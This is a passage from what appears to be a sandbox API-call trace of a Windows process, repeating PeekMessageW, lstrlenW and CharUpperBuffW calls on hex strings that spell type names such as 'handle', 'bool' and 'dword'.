wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] lstrlenW (lpString="68") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] lstrlenW (lpString="61") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] lstrlenW (lpString="6E") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] lstrlenW (lpString="64") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] lstrlenW (lpString="6C") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] lstrlenW (lpString="65") returned 2 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.932] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.933] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.933] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.933] lstrlenW (lpString="68") returned 2 [0085.933] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.933] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] lstrlenW (lpString="61") returned 2 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] lstrlenW (lpString="6E") returned 2 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] lstrlenW (lpString="64") returned 2 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] lstrlenW (lpString="6C") returned 2 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] lstrlenW (lpString="65") returned 2 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.934] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="20") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="30") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="20") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="62") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="6F") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="6F") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] lstrlenW (lpString="6C") returned 2 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.935] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] lstrlenW (lpString="64") returned 2 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] lstrlenW (lpString="77") returned 2 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] lstrlenW (lpString="6F") returned 2 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] lstrlenW (lpString="72") returned 2 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] lstrlenW (lpString="64") returned 2 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] lstrlenW (lpString="20") returned 2 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.936] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] lstrlenW (lpString="30") returned 2 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] lstrlenW (lpString="20") returned 2 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] lstrlenW (lpString="70") returned 2 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] lstrlenW (lpString="74") returned 2 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] lstrlenW (lpString="72") returned 2 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] lstrlenW (lpString="20") returned 2 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.937] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="30") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="20") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="64") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="77") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="6F") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="72") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="64") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] lstrlenW (lpString="2A") returned 2 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.938] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] lstrlenW (lpString="64") returned 2 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] lstrlenW (lpString="77") returned 2 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] lstrlenW (lpString="6F") returned 2 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] lstrlenW (lpString="72") returned 2 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.939] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] lstrlenW (lpString="64") returned 2 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] lstrlenW (lpString="20") returned 2 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] lstrlenW (lpString="30") returned 2 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] lstrlenW (lpString="20") returned 2 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.940] lstrlenW (lpString="20") returned 2 [0085.940] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 